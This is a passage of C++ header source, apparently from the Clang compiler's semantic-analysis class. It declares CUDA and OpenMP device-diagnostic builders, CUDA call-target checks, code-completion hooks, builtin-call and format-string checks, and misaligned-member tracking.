class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Indicate that this function (and thus everything it transtively calls)
/// will be codegen'ed, and emit any deferred diagnostics on this function and
/// its (transitive) callees.
void markKnownEmitted(
Sema &S, FunctionDecl *OrigCaller, FunctionDecl *OrigCallee,
SourceLocation OrigLoc,
const llvm::function_ref<bool(Sema &, FunctionDecl *)> IsKnownEmitted);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller function which needs address of \p Callee.
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds a function in \p Matches with highest calling priority
/// from \p Caller context and erases all functions with lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given a implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure kernel call, with the
/// parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains 'break' or 'continue'
/// statement that produces control flow different from GCC.
void CheckBreakContinueBinding(Expr *E);
/// Check whether receiver is mutable ObjC container which
/// attempts to add itself into the container
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Peform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field
/// as this may be a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
/// Retrieve the keyword associated
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// To be used for checking whether the arguments being passed to
/// function exceeds the number of parameters expected for it.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks if the expression is in the sef of potentially
/// misaligned members and it is converted to some pointer type T with lower
/// or equal alignment requirements. If so it removes it. This is used when
/// we do not want to diagnose such misaligned access (e.g. in conversions to
/// void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
